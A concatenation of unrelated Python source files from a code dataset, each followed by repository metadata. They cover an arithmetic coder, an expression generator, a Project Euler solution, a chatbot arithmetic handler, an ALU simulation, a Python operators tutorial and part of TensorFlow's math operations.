        """Encodes a symbol returning a sequence of coded bits.

        The encoder is stateful and (since it is hopefully compressing the
        input) it will not return output bits for each input symbol.
        You will need to flush the encoder to get remaining coded bits after
        encoding the complete sequence.
        """
        # Find the split point. model.update() both updates the model and
        # returns the log-probability of the observed symbol.
        p_symbol = math.exp(self.model.update(symbol))
        p_zero = p_symbol if symbol == 0 else 1 - p_symbol
        # max(1, ...) keeps the zero sub-interval non-empty.
        split = self.low + max(1, int((self.high - self.low) * p_zero))  # 0-interval is [self.low, split)

        # Narrow the interval to the sub-range of the observed symbol.
        if symbol:
            self.low = split
        else:
            self.high = split

        # Renormalization: while the interval no longer overlaps the
        # midpoint, the next bit is known; rescale to regain precision.
        # If the interval overlaps the midpoint but lies within the middle
        # half [1/4, 3/4), rescale and remember it with a follow-bit
        # counter: once the next real bit is known, each follow bit is its
        # opposite (the value is known to hug the midpoint from that side).
        output = []
        while True:
            if self.high <= self._half:
                output.append(0)
                output.extend([1] * self.follow_bits)  # Add the follow bits
                self.follow_bits = 0
            elif self.low >= self._half:
                output.append(1)
                output.extend([0] * self.follow_bits)  # Add the follow bits
                self.follow_bits = 0
                self.low -= self._half
                self.high -= self._half
            elif self.low >= self._1_4 and self.high <= self._3_4:
                # Underflow: straddles the midpoint inside the middle half.
                self.follow_bits += 1
                self.low -= self._1_4
                self.high -= self._1_4
            else:
                break
            self.low *= 2
            self.high *= 2
        return output

    def flush(self):
        """Flushes any coded bits in the encoder. Typically called after the
        entire sequence has been encoded.
        """
        # One disambiguating bit plus the pending follow bits.
        if self.low < self._1_4:
            return [0] + [1] * (self.follow_bits + 1)
        return [1] + [0] * (self.follow_bits + 1)
class BinaryArithmeticDecoder:
    """Decoder mirroring BinaryArithmeticEncoder: feed coded bits one at a
    time via decode(); symbols are emitted as soon as they are determined.
    Requires the same prediction model (in its initial state) that was used
    for encoding.
    """

    def __init__(self, model, num_bits = 32):
        # NOTE(review): decode() calls model.predict(0) and treats the result
        # as a plain probability, while the encoder uses exp(model.update());
        # confirm the model exposes both in compatible units.
        self.model = model
        self.num_bits = num_bits
        self._top = 2 ** self.num_bits
        self._half = self._top // 2 # [0, self._half) outputs the zero bit
        self._1_4 = self._half // 2
        self._3_4 = self._top - self._1_4
        self.low = 0
        self.high = 1 # This ensures num_bits are read before decoding
        self.value = 0

    def decode(self, bit):
        # Renormalize [low, high) the same way the encoder did, keeping the
        # accumulated code word `value` in step with the interval.
        if self.low >= self._half:
            self.value -= self._half
            self.low -= self._half
            self.high -= self._half
        elif self.low >= self._1_4 and self.high <= self._3_4:
            # Underflow case: interval lies inside the middle half.
            self.value -= self._1_4
            self.low -= self._1_4
            self.high -= self._1_4
        # Double the interval and shift the incoming bit into the code word.
        self.low *= 2
        self.high *= 2
        self.value *= 2
        self.value += bit
        output = []
        # While the interval straddles the midpoint, the next symbol is
        # determined by which side of the model's split `value` falls on;
        # once it no longer straddles, more input bits are needed.
        while self.low < self._half < self.high:
            p_zero = self.model.predict(0)
            split = self.low + int((self.high - self.low) * p_zero) # 0-interval is [self.low, split)
            symbol = 0 if self.value < split else 1
            output.append(symbol)
            self.model.update(symbol)
            if symbol:
                self.low = split
            else:
                self.high = split
        return output

    def flush(self, nbits):
        # Pump zero bits through decode() until the remaining `nbits`
        # symbols resolve; truncate any excess.
        output = []
        while len(output) < nbits:
            output += self.decode(0)
        return output[:nbits]
| {
"repo_name": "annakoop/forget-me-not",
"path": "ac.py",
"copies": "2",
"size": "7276",
"license": "unlicense",
"hash": -8301029140236450000,
"line_mean": 34.1497584541,
"line_max": 105,
"alpha_frac": 0.5783397471,
"autogenerated": false,
"ratio": 3.941495124593716,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5519834871693715,
"avg_score": null,
"num_lines": null
} |
"""Arithmetic expression generator.
Usage:
arithgen [options]
arithgen --help
arithgen --version
Options:
-n, --count=<count> Specify how many expressions to
generate. [default: 1]
-d, --difficulty=<difficulty> Specify the complexity of
expressions. [default: 3]
-F, --format=<format> Specify the output format.
[default: {expr} = {result}]
"""
import sys
from docopt import docopt
from arithgen import __version__
from arithgen.generator import generate
def main(argv=None):
    # Command-line entry point; argv defaults to the process arguments
    # (without the program name).
    if argv is None:
        argv = sys.argv[1:]
    # docopt parses the module docstring as the usage specification.
    args = docopt(__doc__, argv=argv,
                  version='arithgen ' + __version__)
    try:
        count = int(args['--count'])
        difficulty = int(args['--difficulty'])
    except ValueError:
        print('Invalid arguments')
        return 1  # non-zero exit status signals bad input
    # Emit `count` generated expressions using the user-supplied format.
    for _ in range(count):
        expr, result = generate(difficulty=difficulty)
        print(args['--format'].format(expr=expr, result=result))
| {
"repo_name": "yyt16384/arithgen",
"path": "arithgen/cmdline.py",
"copies": "2",
"size": "1088",
"license": "mit",
"hash": -1972982082473051100,
"line_mean": 27.6315789474,
"line_max": 66,
"alpha_frac": 0.5597426471,
"autogenerated": false,
"ratio": 4.2007722007722,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 38
} |
"""Arithmetic expressions
Problem 93
By using each of the digits from the set, {1, 2, 3, 4}, exactly once, and making
use of the four arithmetic operations (+, −, *, /) and brackets/parentheses, it
is possible to form different positive integer targets.
For example,
8 = (4 * (1 + 3)) / 2
14 = 4 * (3 + 1 / 2)
19 = 4 * (2 + 3) − 1
36 = 3 * 4 * (2 + 1)
Note that concatenations of the digits, like 12 + 34, are not allowed.
Using the set, {1, 2, 3, 4}, it is possible to obtain thirty-one different
target numbers of which 36 is the maximum, and each of the numbers 1 to 28 can
be obtained before encountering the first non-expressible number.
Find the set of four distinct digits, a < b < c < d, for which the longest set
of consecutive positive integers, 1 to n, can be obtained, giving your answer
as a string: abcd.
"""
from eulerlib import generateListPermutations, timedRun
generated = {}
def getPermutations(a, b, c, d):
    # All orderings of the four digits (delegates to eulerlib's helper).
    return generateListPermutations([a,b,c,d])
def allGroupings(m):
    """Return the 11 distinct parenthesizations of `a op1 b op2 c op3 d`
    for the 4-sequence *m*, as template strings with op1/op2/op3
    placeholders still to be substituted."""
    templates = (
        # no grouping: 1111
        "{0} op1 {1} op2 {2} op3 {3}",
        # groups of 2: 112 121 211 22
        "{0} op1 {1} op2 ({2} op3 {3})",
        "{0} op1 ({1} op2 {2}) op3 {3}",
        "({0} op1 {1}) op2 {2} op3 {3}",
        "({0} op1 {1}) op2 ({2} op3 {3})",
        # groups of 3: 13 31
        "{0} op1 ({1} op2 {2} op3 {3})",
        "({0} op1 {1} op2 {2}) op3 {3}",
        # groups of groups: 1(21) 1(12) (21)1 (12)1
        "{0} op1 (({1} op2 {2}) op3 {3})",
        "{0} op1 ({1} op2 ({2} op3 {3}))",
        "(({0} op1 {1}) op2 {2}) op3 {3}",
        "({0} op1 ({1} op2 {2})) op3 {3}",
    )
    a, b, c, d = m
    return [t.format(a, b, c, d) for t in templates]
def allOperations():
    """Return all 4**3 = 64 ordered triples of the operators + - * /,
    ordered as three nested base-4 digits (last operator varies fastest)."""
    ops = "+-*/"
    return [(ops[i], ops[j], ops[k])
            for i in range(4)
            for j in range(4)
            for k in range(4)]
def applyPatterns(a, b, c, d):
    """Evaluate every expression formed from digits a, b, c, d under all
    permutations, parenthesizations and operator choices, recording each
    positive-integer result as a key of the module-level `generated` dict.

    NOTE: eval() is applied to internally generated expressions only; never
    feed this function external input.
    """
    ops = allOperations()
    for perm in getPermutations(a, b, c, d):
        for template in allGroupings(perm):
            for o1, o2, o3 in ops:
                expr = template.replace("op1", o1).replace("op2", o2).replace("op3", o3)
                try:
                    v = eval(expr)
                except ZeroDivisionError:
                    # Division by zero: skip this combination.
                    # (Bug fix: the original used a bare `None` expression
                    # here, a confusing no-op where `pass`/`continue` was meant.)
                    continue
                iv = int(v)
                # Count only positive integer results.
                if v == iv and iv > 0:
                    generated[iv] = True
def countConsecutive():
    """Return the largest n such that every integer 1..n is a key of the
    module-level `generated` dict (0 when 1 itself is missing).

    Bug fix: the original walked `generated.keys()` in dict *insertion*
    order -- the order results happened to be produced in -- so runs of
    consecutive values were miscounted; it also measured the longest run
    anywhere instead of the run anchored at 1 required by the problem
    statement ("1 to n"), and raised IndexError on an empty dict.
    """
    n = 1
    while n in generated:
        n += 1
    return n - 1
def euler93():
    """Search every digit set a < b < c < d (digits 1..9) and return the
    one whose expressions yield the longest run of consecutive targets."""
    global generated
    maxConsecutive = 0
    sequence = ()
    for a in range(1,10):
        for b in range(a+1, 10):
            for c in range(b+1, 10):
                for d in range(c+1, 10):
                    generated = {}  # reset the shared result table per digit set
                    applyPatterns(a, b, c, d)
                    consecutive = countConsecutive()
                    print(a, b, c, d, consecutive)  # progress/debug output
                    if consecutive > maxConsecutive:
                        maxConsecutive = consecutive
                        sequence = (a, b, c, d)
    return sequence
print("result:", timedRun(euler93))
| {
"repo_name": "feliposz/project-euler-solutions",
"path": "python/euler93.py",
"copies": "1",
"size": "3642",
"license": "mit",
"hash": 1709373575958708200,
"line_mean": 31.7747747748,
"line_max": 87,
"alpha_frac": 0.5258383727,
"autogenerated": false,
"ratio": 3.039264828738513,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4065103201438513,
"avg_score": null,
"num_lines": null
} |
"""arithmetichandler.py -- Basic math and arithmetic
Copyright 2016 Rylan Santinon
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import division
from ..response import Response
from ..handlerbase import StatementHandlerBase
from math import log, log10, sqrt, sin, cos, tan
class ArithmeticHandler(StatementHandlerBase):
    """Statement handler for basic arithmetic embedded in free-form text.

    Handles infix requests ("5 plus 2", "compute 4 * -2") and unary
    functions ("square root of 100", "log 100").  When several operator
    tokens appear in a statement, the last one found is the one applied.
    """

    _ADD = lambda x, y: x + y
    _SUBTRACT = lambda x, y: x - y
    _PRODUCT = lambda x, y: x*y
    _DIVIDE = lambda x, y: x/y

    # (token, operation) pairs; both symbols and spelled-out words match.
    INFIX_OPS = [('+', _ADD),
                 ('plus', _ADD),
                 ('-', _SUBTRACT),
                 ('/', _DIVIDE),
                 ('by', _DIVIDE),
                 ('minus', _SUBTRACT),
                 ('*', _PRODUCT),
                 ('times', _PRODUCT)]

    UNARY_OPS = [('root', sqrt),
                 ('sqrt', sqrt),
                 ('sin', sin),
                 ('cos', cos),
                 ('tan', tan),
                 ('ln', log),
                 ('log', log10)]

    def _is_number_in(self, tokens):
        """Return true if there is a number available

        >>> ArithmeticHandler()._is_number_in('5 of them'.split(' '))
        True
        """
        for token in tokens:
            try:
                float(token)
            except ValueError:
                continue
            return True
        return False

    def _has_number_after(self, tokens, ix):
        """Check if number occurs after given index

        >>> ArithmeticHandler()._has_number_after("give me log of 7".split(), 3)
        True

        >>> ArithmeticHandler()._has_number_after("what is 7 log of?".split(), 3)
        False
        """
        def try_parse_float(x):
            try:
                return float(x)
            except ValueError:
                return None
        # Bug fix: compare against None so that a literal "0" counts as a
        # number (0.0 is falsy, so the old truthiness check missed it).
        return any(try_parse_float(x) is not None for x in tokens[ix:])

    def _has_infix(self, statement):
        """Return true if it is able to handle infix operation

        >>> ArithmeticHandler()._has_infix("calculate 5 plus 2")
        True

        >>> ArithmeticHandler()._has_infix("calculate + 2 please")
        False
        """
        tokens = statement.split(' ')
        for ix, token in enumerate(tokens):
            for op, _ in ArithmeticHandler.INFIX_OPS:
                if op == token:
                    # Need an operand on each side of the operator token.
                    return self._is_number_in(tokens[ix:]) and self._is_number_in(tokens[:ix])
        return False

    def _has_unary(self, statement):
        """Return true if unary statement can be handled

        >>> ArithmeticHandler()._has_unary('what is square root of 5')
        True

        >>> ArithmeticHandler()._has_unary('what is square root of')
        False

        >>> ArithmeticHandler()._has_unary('root 64.0')
        True

        >>> ArithmeticHandler()._has_unary('what is 12 of 5')
        False
        """
        tokens = statement.split(' ')
        for ix, token in enumerate(tokens):
            for op, _ in ArithmeticHandler.UNARY_OPS:
                if op == token:
                    # The operand must appear after the function name.
                    return self._is_number_in(tokens[ix:])
        return False

    def _calc_unary(self, statement):
        """Return output of unary operation

        >>> ArithmeticHandler()._calc_unary('what is root of 16')
        4.0

        >>> ArithmeticHandler()._calc_unary('calculate log 100')
        2.0

        >>> ArithmeticHandler()._calc_unary('you know what square root of 64 is?')
        8.0
        """
        tokens = statement.split(' ')
        op_func = None
        start_ix = 0
        arg = None
        # The last matching operator token wins.
        for ix, token in enumerate(tokens):
            for op_word, func in ArithmeticHandler.UNARY_OPS:
                if op_word == token:
                    op_func = func
                    start_ix = ix
        # First number after the operator is its argument.
        for token in tokens[start_ix:]:
            try:
                number = float(token)
                arg = number
                break
            except ValueError:
                pass
        # Bug fix: identity comparison with None (was `== None`).
        if op_func is None or arg is None:
            raise RuntimeError("Unable to calculate unary operation: %s" % statement)
        return op_func(arg)

    def _calc_infix(self, statement):
        """Return output of infix operation

        >>> ArithmeticHandler()._calc_infix('7 + 2')
        9.0

        >>> ArithmeticHandler()._calc_infix('tell me 20 minus 48')
        -28.0
        """
        tokens = statement.split(' ')
        op_func = None
        start_ix = 0
        arg_a = None
        arg_b = None
        # The last matching operator token wins.
        for ix, token in enumerate(tokens):
            for op_word, func in ArithmeticHandler.INFIX_OPS:
                if op_word == token:
                    op_func = func
                    start_ix = ix
        # First number after the operator is the right operand...
        for token in tokens[start_ix:]:
            try:
                number = float(token)
                arg_b = number
                break
            except ValueError:
                pass
        # ...and the first number before it is the left operand.
        for token in tokens[:start_ix]:
            try:
                number = float(token)
                arg_a = number
                break
            except ValueError:
                pass
        # Bug fix: identity comparison with None (was `== None`).
        if op_func is None or arg_a is None or arg_b is None:
            raise RuntimeError("Unable to calculate operation: %s" % statement)
        return op_func(arg_a, arg_b)

    def can_handle(self, statement, memory=None):
        # Case-insensitive: operator words are matched in lower case.
        low = statement.lower()
        return self._has_infix(low) or self._has_unary(low)

    def handle(self, statement, memory=None):
        """Respond to basic arithmetic request

        >>> ArithmeticHandler().handle("compute 4 * -2").answer
        '-8.0'

        >>> ArithmeticHandler().handle("3.0 times 9.0").answer
        '27.0'

        >>> ArithmeticHandler().handle("What is 13 - 20").answer
        '-7.0'

        >>> ArithmeticHandler().handle("Calculate for me square root of 100").answer
        '10.0'
        """
        if self._has_unary(statement):
            num = self._calc_unary(statement)
            return Response(str(num), [])
        elif self._has_infix(statement):
            num = self._calc_infix(statement)
            return Response(str(num), [])
        raise RuntimeError("ArithmeticHandler reported ability to handle %s but can't" % statement)
if __name__ == '__main__':
    # Run the embedded doctests when executed directly.
    import doctest
    doctest.testmod()
| {
"repo_name": "rylans/figaro",
"path": "figaro/handlers/arithmetichandler.py",
"copies": "1",
"size": "6820",
"license": "apache-2.0",
"hash": 5487474149858438000,
"line_mean": 30.4285714286,
"line_max": 99,
"alpha_frac": 0.5304985337,
"autogenerated": false,
"ratio": 4.33015873015873,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5360657263858729,
"avg_score": null,
"num_lines": null
} |
''' Arithmetic implemented using Python builtin functions instead of logic gates '''
'''----------------------------- Imports -----------------------------'''
# Hack computer
from ._x__components import *
'''----------------------------- Helpers -----------------------------'''
largestInt_ = 2 ** ( N_BITS - 1 ) - 1 # two's complement
def isNegative_( x ):
	''' 2s complement -> any value above the largest positive int has its MSB set '''
	return 1 if x > largestInt_ else 0
def trim_( x ):
	''' mask away any overflow bits above the machine word width '''
	return x & negativeOne_
'''------------------------- Shift Registers -------------------------'''
def shiftRight_( x, y ):
	''' logical right shift of x by y bit positions '''
	return x >> y
def shiftLeft_( x, y ):
	''' logical left shift of x by y, truncated to the machine word width.
	    Bug fix: the original called undefined name `trim`; the module
	    helper is `trim_`, so every call raised NameError. '''
	return trim_( x << y )
'''--------------------- Arithmetic Logic Unit ---------------------'''
# MSB to LSB
def ALU_( N, x, y, fub1, fub0, zx, nx, zy, ny, f, no ):
	''' N bit ALU.

	    Function-unit select (fub1, fub0):
	      1,1 -> add/and unit with modifiers:
	             zx/zy zero an input, nx/ny bitwise-negate it,
	             f chooses x+y (1) or x&y (0), no negates the output
	      1,0 -> x ^ y
	      0,1 -> shift x left by y
	      0,0 -> shift x right by y

	    Returns ( out, zr, ng ): zr flags a zero result, ng a negative
	    (two's-complement) result.  NOTE(review): parameter N is unused;
	    the word width comes from the module-level constants.
	'''
	out = None
	if fub1 == 1:
		if fub0 == 1:
			if zx == 1: x = 0
			if nx == 1: x = notN_( x )
			if zy == 1: y = 0
			if ny == 1: y = notN_( y )
			# Bug fix: the sum was passed to undefined name `trim`
			# (NameError at runtime); the module helper is `trim_`.
			if f == 1: out = trim_( x + y )
			elif f == 0: out = x & y
			if no == 1: out = notN_( out )
		elif fub0 == 0:
			out = x ^ y
	elif fub1 == 0:
		if fub0 == 1:
			out = shiftLeft_( x, y )
		elif fub0 == 0:
			out = shiftRight_( x, y )
	zr = 1 if out == 0 else 0
	ng = isNegative_( out )
	return ( out, zr, ng )
| {
"repo_name": "JetStarBlues/Nand-2-Tetris",
"path": "OldArchitecture/v1.0/Components/_2__arithmetic_performance.py",
"copies": "2",
"size": "1374",
"license": "mit",
"hash": 20984491368448300,
"line_mean": 15.962962963,
"line_max": 84,
"alpha_frac": 0.4366812227,
"autogenerated": false,
"ratio": 2.980477223427332,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4417158446127332,
"avg_score": null,
"num_lines": null
} |
# Arithmetic:
print(10 * 'x')  # xxxxxxxxxx
print(5 / 2)     # 2.5
print(5 // 2)    # 2
print(2 ** 8)    # 256

# Indexing (variable renamed from `list` -- never shadow a builtin):
items = [1, 2, 3, 4, 5]
print(items[0])   # 1
print(items[-1])  # 5
# print(items[99])  # IndexError: list index out of range

# Slicing:
items = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(items[1:4])    # [2, 3, 4]
print(items[1:])     # [2, 3, 4, 5, 6, 7, 8, 9, 10]
print(items[:3])     # [1, 2, 3]
print(items[1:7:2])  # [2, 4, 6]
print(items[::-1])   # [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
print(items[:])      # [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

# Logical:
a = 1
b = 2
print(a == 1 and b == 2)  # True
print(1 and 2)  # 2
print(0 or 2)   # 2

# Assignment:
list1 = [1, 2, 3]
list2 = [4, 5]
# Beware that `list1 += list2` modifies the list in-place while `list1 = list1
# + list2` creates a new list:
print(id(list1))
list1 += list2
print(id(list1))  # same id as above: extended in place
list1 = list1 + list2
print(id(list1))  # different id: a brand-new list (oops)

# For an example of the "walrus operator" :=, see 29-walrus-operator.py.

# in:
print(3 in [1, 2, 3, 4])  # True

# is:
a = [1, 2, 3]
# Bug fix: this line previously read `a = b`, which threw away the list and
# compared 2 is 2 -- the demo is meant to show two names bound to one list.
b = a
print(a is b)  # True

# Caching curiosity (unexpected behavior; run this in an interpreter):
# >>> a = 1
# >>> b = 1
# >>> a is b
# True
# >>> a = 300
# >>> b = 300
# >>> a is b
# False
#
# See http://stackoverflow.com/q/306313/2580955 and
# http://stackoverflow.com/q/15171695/2580955 for more details.
| {
"repo_name": "s3rvac/talks",
"path": "2021-03-08-Introduction-to-Python/examples/14-operations.py",
"copies": "1",
"size": "1407",
"license": "bsd-3-clause",
"hash": -5558958110940477000,
"line_mean": 22.0655737705,
"line_max": 78,
"alpha_frac": 0.5579246624,
"autogenerated": false,
"ratio": 2.236883942766296,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8273676453386931,
"avg_score": 0.0042264303558729064,
"num_lines": 61
} |
"""## Arithmetic Operators
TensorFlow provides several operations that you can use to add basic arithmetic
operators to your graph.
@@add
@@sub
@@mul
@@div
@@mod
## Basic Math Functions
TensorFlow provides several operations that you can use to add basic
mathematical functions to your graph.
@@add_n
@@abs
@@neg
@@sign
@@inv
@@square
@@round
@@sqrt
@@rsqrt
@@pow
@@exp
@@log
@@ceil
@@floor
@@maximum
@@minimum
@@cos
@@sin
## Matrix Math Functions
TensorFlow provides several operations that you can use to add basic
mathematical functions for matrices to your graph.
@@diag
@@transpose
@@matmul
@@batch_matmul
@@matrix_determinant
@@batch_matrix_determinant
@@matrix_inverse
@@batch_matrix_inverse
@@cholesky
@@batch_cholesky
## Complex Number Functions
TensorFlow provides several operations that you can use to add complex number
functions to your graph.
@@complex
@@complex_abs
@@conj
@@imag
@@real
## Reduction
TensorFlow provides several operations that you can use to perform
common math computations that reduce various dimensions of a tensor.
@@reduce_sum
@@reduce_prod
@@reduce_min
@@reduce_max
@@reduce_mean
@@reduce_all
@@reduce_any
@@accumulate_n
## Segmentation
TensorFlow provides several operations that you can use to perform common
math computations on tensor segments.
Here a segmentation is a partitioning of a tensor along
the first dimension, i.e. it defines a mapping from the first dimension onto
`segment_ids`. The `segment_ids` tensor should be the size of
the first dimension, `d0`, with consecutive IDs in the range `0` to `k`,
where `k<d0`.
In particular, a segmentation of a matrix tensor is a mapping of rows to
segments.
For example:
```python
c = tf.constant([[1,2,3,4], [-1,-2,-3,-4], [5,6,7,8]])
tf.segment_sum(c, tf.constant([0, 0, 1]))
==> [[0 0 0 0]
[5 6 7 8]]
```
@@segment_sum
@@segment_prod
@@segment_min
@@segment_max
@@segment_mean
@@unsorted_segment_sum
@@sparse_segment_sum
@@sparse_segment_mean
## Sequence Comparison and Indexing
TensorFlow provides several operations that you can use to add sequence
comparison and index extraction to your graph. You can use these operations to
determine sequence differences and determine the indexes of specific values in
a tensor.
@@argmin
@@argmax
@@listdiff
@@where
@@unique
@@edit_distance
@@invert_permutation
"""
import itertools
import tensorflow.python.platform
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import types
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import common_shapes
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import gen_state_ops
# pylint: disable=wildcard-import,undefined-variable
from tensorflow.python.ops.gen_math_ops import *
# Aliases for some automatically-generated names.
argmax = gen_math_ops.arg_max
argmin = gen_math_ops.arg_min
linspace = gen_math_ops.lin_space
# pylint: disable=anomalous-backslash-in-string,protected-access
def abs(x, name=None):
  """Computes the absolute value of a tensor.

  Given a tensor of real numbers `x`, this operation returns a tensor
  containing the absolute value of each element in `x`. For example, if x is
  an input element and y is an output element, this operation computes
  \\\\(y = |x|\\\\).

  See [`tf.complex_abs()`](#tf_complex_abs) to compute the absolute value of a complex
  number.

  Args:
    x: A `Tensor` of type `float`, `double`, `int32`, or `int64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` the same size and type as `x` with absolute values.
  """
  with ops.op_scope([x], name, "Abs") as scope:
    tensor = ops.convert_to_tensor(x, name="x")
    # Complex inputs are routed to the magnitude kernel.
    if tensor.dtype == types.complex64:
      return gen_math_ops.complex_abs(tensor, name=scope)
    return gen_math_ops._abs(tensor, name=scope)
def pow(x, y, name=None):
  """Computes the power of one value to another, element-wise.

  Given a tensor `x` and a tensor `y`, this operation computes \\\\(x^y\\\\) for
  corresponding elements in `x` and `y`. For example:

  ```
  # tensor 'x' is [[2, 2]], [3, 3]]
  # tensor 'y' is [[8, 16], [2, 3]]
  tf.pow(x, y) ==> [[256, 65536], [9, 27]]
  ```

  Args:
    x: A `Tensor` of type `float`, `double`, `int32`, `complex64`, or `int64`.
    y: A `Tensor` of type `float`, `double`, `int32`, `complex64`, or `int64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor`.
  """
  with ops.op_scope([x], name, "Pow") as scope:
    return gen_math_ops._pow(x, y, name=scope)
def complex(real, imag, name=None):
  """Converts two real numbers to a complex number.

  Given a tensor `real` for the real part and a tensor `imag` for the
  imaginary part, this operation computes complex numbers elementwise of the
  form \\\\(a + bj\\\\), where *a* comes from `real` and *b* from `imag`.
  The two input tensors must have the same shape.

  For example:

  ```
  # tensor 'real' is [2.25, 3.25]
  # tensor `imag` is [4.75, 5.75]
  tf.complex(real, imag) ==> [[2.25 + 4.74j], [3.25 + 5.75j]]
  ```

  Args:
    real: A `Tensor` of type `float`.
    imag: A `Tensor` of type `float`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `complex64`.
  """
  with ops.op_scope([real, imag], name, "Complex") as scope:
    return gen_math_ops._complex(real, imag, name=scope)
def round(x, name=None):
  """Rounds the values of a tensor to the nearest integer, element-wise.

  For example:

  ```python
  # 'a' is [0.9, 2.5, 2.3, -4.4]
  tf.round(a) ==> [ 1.0, 3.0, 2.0, -4.0 ]
  ```

  Args:
    x: A `Tensor` of type `float` or `double`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of same shape and type as `x`.
  """
  x = ops.convert_to_tensor(x, name="x")
  # Integer tensors are already "rounded"; otherwise round half up via floor.
  return x if x.dtype.is_integer else floor(x + 0.5, name=name)
def cast(x, dtype, name=None):
  """Casts a tensor to a new type.

  The operation casts `x` (in case of `Tensor`) or `x.values`
  (in case of `SparseTensor`) to `dtype`.

  For example:

  ```python
  # tensor `a` is [1.8, 2.2], dtype=tf.float
  tf.cast(a, tf.int32) ==> [1, 2]  # dtype=tf.int32
  ```

  Args:
    x: A `Tensor` or `SparseTensor`.
    dtype: The destination type.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` or `SparseTensor` with same shape as `x`.

  Raises:
    TypeError: If `x` cannot be cast to the `dtype`.
  """
  with ops.op_scope([x], name, "Cast") as scope:
    # Sparse tensors: cast only the values; indices/shape stay integral.
    if isinstance(x, ops.SparseTensor):
      new_values = cast(x.values, dtype, name=scope)
      return ops.SparseTensor(x.indices, new_values, x.shape)
    # Note: ops.convert_to_tensor(x, dtype=dtype, ...) would permit
    # conversions (e.g. numbers to strings) that cast() deliberately
    # does not support, so convert first and cast separately.
    x = ops.convert_to_tensor(x, name="x")
    if x.dtype.base_dtype == dtype:
      return x
    return gen_math_ops.cast(x, dtype, name=scope)
def to_float(x, name="ToFloat"):
"""Casts a tensor to type `float32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float32`.
Raises:
TypeError: If `x` cannot be cast to the `float32`.
"""
return cast(x, types.float32, name=name)
def to_double(x, name="ToDouble"):
"""Casts a tensor to type `float64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float64`.
Raises:
TypeError: If `x` cannot be cast to the `float64`.
"""
return cast(x, types.float64, name=name)
def to_int32(x, name="ToInt32"):
"""Casts a tensor to type `int32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int32`.
Raises:
TypeError: If `x` cannot be cast to the `int32`.
"""
return cast(x, types.int32, name=name)
def to_int64(x, name="ToInt64"):
"""Casts a tensor to type `int64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int64`.
Raises:
TypeError: If `x` cannot be cast to the `int64`.
"""
return cast(x, types.int64, name=name)
def to_bfloat16(x, name="ToBFloat16"):
  """Casts a tensor to type `bfloat16`.

  Args:
    x: A `Tensor` or `SparseTensor`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` or `SparseTensor` with same shape as `x`, with type `bfloat16`.

  Raises:
    TypeError: If `x` cannot be cast to `bfloat16`.
  """
  # Delegate to the generic cast() so SparseTensor inputs are handled too.
  target_dtype = types.bfloat16
  return cast(x, target_dtype, name=name)
# Hook the unary operators on Tensor so that -t, abs(t) and ~t build graph ops.
ops.Tensor._override_operator("__neg__", neg)
ops.Tensor._override_operator("__abs__", abs)
# __invert__ corresponds to the ~ operator. Here we follow the numpy convention
# ~ marks an elementwise bit-wise inverse. This is only implemented for boolean
# tensors and will throw a TypeError if used on nonboolean arrays
ops.Tensor._override_operator("__invert__", logical_not)
def _OverrideBinaryOperatorHelper(func, op_name):
  """Register operators with different tensor and scalar versions.

  Args:
    func: the operator
    op_name: name of the operator being overridden
  """
  # Forward wrapper: Tensor <op> other. The non-Tensor operand is converted
  # to a tensor of the Tensor operand's base dtype before calling 'func'.
  def binary_op_wrapper(x, y):
    with ops.op_scope([x, y], None, op_name) as name:
      assert isinstance(x, ops.Tensor)
      y = ops.convert_to_tensor(y, dtype=x.dtype.base_dtype, name="y")
      return func(x, y, name=name)
  ops.Tensor._override_operator("__%s__" % op_name, binary_op_wrapper)
  del binary_op_wrapper
  # Reflected wrapper: other <op> Tensor. Python invokes __r<op>__ on the
  # Tensor when the left operand cannot handle the operation; note the
  # argument order is swapped back before calling 'func'.
  def r_binary_op_wrapper(y, x):
    with ops.op_scope([x, y], None, op_name) as name:
      assert isinstance(y, ops.Tensor)
      x = ops.convert_to_tensor(x, dtype=y.dtype.base_dtype, name="x")
      return func(x, y, name=name)
  ops.Tensor._override_operator("__r%s__" % op_name, r_binary_op_wrapper)
  del r_binary_op_wrapper
# Register the arithmetic operators (and their reflected __r*__ variants)
# on Tensor via the helper above.
_OverrideBinaryOperatorHelper(add, "add")
_OverrideBinaryOperatorHelper(sub, "sub")
_OverrideBinaryOperatorHelper(mul, "mul")
_OverrideBinaryOperatorHelper(div, "div")
_OverrideBinaryOperatorHelper(mod, "mod")
def logical_xor(x, y, name="LogicalXor"):
